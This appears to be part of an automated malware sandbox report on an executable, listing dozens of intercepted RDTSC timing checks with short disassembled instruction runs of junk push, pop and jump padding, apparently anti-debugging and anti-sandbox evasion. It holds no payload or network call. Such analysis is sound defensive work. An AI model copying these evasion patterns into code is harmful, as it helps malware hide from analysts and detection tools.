                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EA6A4D second address: EA6A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EA65C2 second address: EA65C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EABDC3 second address: EABDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EABDD4 second address: EABDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F43C8AE0076h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EABDDF second address: EABE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F43C9098CE6h 0x0000000b pop eax 0x0000000c jc 00007F43C9098CEAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a jng 00007F43C9098CE6h 0x00000020 jmp 00007F43C9098CF0h 0x00000025 popad 0x00000026 pushad 0x00000027 jmp 00007F43C9098CEAh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC3BD9 second address: EC3BF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F43C8AE0081h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC3BF7 second address: EC3BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC29E9 second address: EC29F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC29F2 second address: EC2A2E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43C9098CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F43C9098CF2h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F43C9098CFCh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC2A2E second address: EC2A38 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43C8AE007Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC9B03 second address: EC9B27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F43C9098CFAh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC9854 second address: EC985A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC985A second address: EC985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC985E second address: EC9862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC9862 second address: EC986E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43C9098CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EC986E second address: EC9874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: ED44B9 second address: ED44DC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EDC813 second address: EDC819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EDC819 second address: EDC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EDC81D second address: EDC83B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EE9054 second address: EE905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EEA6E2 second address: EEA6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EEA6E6 second address: EEA6EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EEA6EB second address: EEA6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EEA6F8 second address: EEA6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EEA6FE second address: EEA704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EED861 second address: EED86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EED86A second address: EED871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EED580 second address: EED584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06F0C second address: F06F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C8AE0087h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06F37 second address: F06F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF9h 0x00000007 jg 00007F43C9098CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F43C9098CE8h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 jmp 00007F43C9098CF3h 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06F7C second address: F06F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F43C8AE0076h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F05E80 second address: F05E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F05E84 second address: F05E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F43C8AE007Bh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F0643D second address: F06441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06441 second address: F06445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06445 second address: F06455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43C9098CEAh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06455 second address: F0645C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06985 second address: F06989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06989 second address: F0699B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F0699B second address: F069B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43C9098CF1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F069B8 second address: F069BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F069BC second address: F069C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: F06C6D second address: F06C73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5410033 second address: 541003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 22h 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541003A second address: 5410040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5410040 second address: 5410077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov si, AB49h 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F43C9098CF4h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5410077 second address: 541007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541007B second address: 541007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541007F second address: 5410085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0E64 second address: 53F0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CEDh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0E85 second address: 53F0EA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov bh, 17h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C8AE0080h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0EA2 second address: 53F0EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43C9098CF5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0EC9 second address: 53F0ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0ED9 second address: 53F0F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F43C9098CF7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C9098CF5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F2B second address: 5430F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F3A second address: 5430F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F3E second address: 5430F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F4E second address: 5430F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F52 second address: 5430F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F56 second address: 5430F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F5C second address: 5430F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430F62 second address: 5430F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D008F second address: 53D00F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43C8AE007Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 pushfd 0x00000014 jmp 00007F43C8AE007Dh 0x00000019 sub ah, FFFFFFC6h 0x0000001c jmp 00007F43C8AE0081h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F43C8AE0088h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D00F8 second address: 53D0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0185 second address: 53D018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D018B second address: 53D0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0C2C second address: 53F0C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0C32 second address: 53F0C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0C36 second address: 53F0C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0C3A second address: 53F0C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov si, 5469h 0x0000000e jmp 00007F43C9098CF6h 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F43C9098CF0h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F43C9098CF7h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0C8D second address: 53F0CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 340672BAh 0x00000008 mov dh, 00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F073B second address: 53F0764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F43C9098CEAh 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F43C9098CECh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0656 second address: 53F065C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F065C second address: 53F0693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F43C9098CEBh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43C9098CF0h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0693 second address: 53F0697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0697 second address: 53F069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F069D second address: 53F06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F06A3 second address: 53F06DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C9098CF7h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F06DC second address: 53F06E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F06E2 second address: 53F06E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F03F4 second address: 53F0436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C8AE0081h 0x00000008 pop esi 0x00000009 call 00007F43C8AE0081h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43C8AE007Eh 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0436 second address: 53F0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 movsx ebx, cx 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0450 second address: 53F046E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F046E second address: 53F0472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F0472 second address: 53F0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5400225 second address: 5400247 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF7h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5400247 second address: 540026B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 540026B second address: 5400285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5400285 second address: 54002E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B5E4h 0x00000007 pushfd 0x00000008 jmp 00007F43C8AE007Dh 0x0000000d sub ah, 00000026h 0x00000010 jmp 00007F43C8AE0081h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F43C8AE0083h 0x00000022 call 00007F43C8AE0088h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54002E3 second address: 5400313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 7651E4EDh 0x00000011 mov esi, 05F4E2E9h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F43C9098CEBh 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5400313 second address: 5400318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
